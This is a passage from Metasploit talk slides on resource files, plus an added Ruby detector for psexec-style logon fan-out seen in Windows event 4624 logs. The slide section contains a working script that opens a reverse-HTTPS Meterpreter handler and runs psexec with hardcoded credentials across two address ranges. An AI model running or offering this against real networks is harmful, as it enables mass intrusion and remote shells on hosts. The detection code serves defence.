Metasploit magic the dark corners of the framework
- 12. resource files
line by line script
can understand ruby
for meterpreter sessions now!
./msfconsole -r psexec.rc
msf> resource psexec.rc
- 13. psexec scanner

    # One background handler, shared by every session
    use multi/handler
    setg PAYLOAD windows/meterpreter/reverse_https
    setg LHOST 192.168.1.100
    setg LPORT 443
    set ExitOnSession false
    exploit -j -z

    # psexec with fixed credentials; reuse the handler started above
    use windows/smb/psexec
    set SMBUser AdminBob
    set SMBPass ThisPasswordSucks
    set SMBDomain .
    set DisablePayloadHandler true

    # Embedded Ruby: walk both ranges and run the module once per address
    <ruby>
    require 'rex/socket/range_walker'

    rhosts = '10.10.10.0/24,10.10.14.0/24'

    iplist = Rex::Socket::RangeWalker.new(rhosts)
    iplist.each do |rhost|
      self.run_single("set RHOST #{rhost}")
      self.run_single("exploit -j -z")
    end
    </ruby>
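
Seen from the defender's side, a sweep like the one on this slide appears as one source address making network logons with the same account to many hosts within seconds. The Ruby below is an added example, not part of the slides or of Metasploit; the pipe-delimited export format, host names and thresholds are constructed assumptions, built on Windows Security event 4624 with logon type 3 (network logon).

```ruby
require 'time'
require 'set'

# Constructed sample export: time|computer|event_id|logon_type|account|source_ip
SAMPLE_LOG = <<~LOG
  2024-01-01T10:00:01Z|WS-001|4624|3|AdminBob|192.168.1.100
  2024-01-01T10:00:02Z|WS-002|4624|3|AdminBob|192.168.1.100
  2024-01-01T10:00:03Z|WS-003|4624|3|AdminBob|192.168.1.100
  2024-01-01T10:00:04Z|WS-004|4624|3|AdminBob|192.168.1.100
  2024-01-01T10:00:05Z|WS-001|4624|2|alice|-
  2024-01-01T10:05:00Z|FS-01|4624|3|alice|10.10.10.23
  2024-01-01T11:30:00Z|FS-02|4624|3|alice|10.10.10.23
  malformed line
LOG

Logon = Struct.new(:time, :host, :account, :source)

# Keep only successful network logons (event 4624, logon type 3); skip bad lines.
def parse_network_logons(text)
  text.each_line.filter_map do |line|
    f = line.strip.split('|')
    next unless f.size == 6 && f[2] == '4624' && f[3] == '3'
    Logon.new(Time.iso8601(f[0]), f[1], f[4], f[5])
  rescue ArgumentError
    nil # unparseable timestamp
  end
end

# Return { [source, account] => hosts } for every pair that reached at least
# min_hosts distinct machines inside any sliding window of `window` seconds.
def fan_out(logons, min_hosts: 4, window: 60)
  hits = {}
  logons.group_by { |l| [l.source, l.account] }.each do |key, events|
    events.sort_by!(&:time)
    events.each_with_index do |first, i|
      hosts = events[i..].take_while { |e| e.time - first.time <= window }
                         .map(&:host).uniq
      next if hosts.size < min_hosts
      (hits[key] ||= Set.new).merge(hosts)
    end
  end
  hits.transform_values { |s| s.to_a.sort }
end

if __FILE__ == $PROGRAM_NAME
  fan_out(parse_network_logons(SAMPLE_LOG)).each do |(src, acct), hosts|
    puts "#{src} as #{acct}: #{hosts.size} hosts in under a minute: #{hosts.join(', ')}"
  end
end
```

Tune `min_hosts` and `window` against normal administrative traffic, since patch and inventory tools also fan out from a single source.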